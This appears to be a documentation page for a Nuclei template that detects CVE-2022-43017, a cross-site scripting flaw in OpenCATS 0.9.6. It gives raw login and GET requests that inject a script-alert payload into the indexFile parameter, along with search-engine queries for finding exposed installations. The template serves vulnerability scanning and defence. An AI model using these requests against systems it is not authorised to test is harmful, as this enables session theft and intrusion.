OpenCATS 0.9.6 - Cross-Site Scripting
ID: CVE-2022-43017
Severity: medium
Author: arafatansari
Tags: cve,cve2022,xss,opencats,authenticated
Description
Section titled “Description”OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2022-43017
info: name: OpenCATS 0.9.6 - Cross-Site Scripting author: arafatansari severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43017 cwe-id: CWE-79 epss-score: 0.00099 epss-percentile: 0.40565 cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: opencats product: opencats shodan-query: - title:"OpenCATS" - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" tags: cve,cve2022,xss,opencats,authenticated
http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}} - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)"></a><script>alert(document.domain)</script>&isPopup=0 HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<script>alert(document.domain)</script>' - 'CATS=' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022100d4855c3a345c6d07342d53ab4f6d34dab8d66c36b6df032bd463cdfb09bbfa3f022032e766217ba25a9f95c8b72ab1629324d5ab982f8b72fa23af0932a051f2dc03:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-43017.yaml"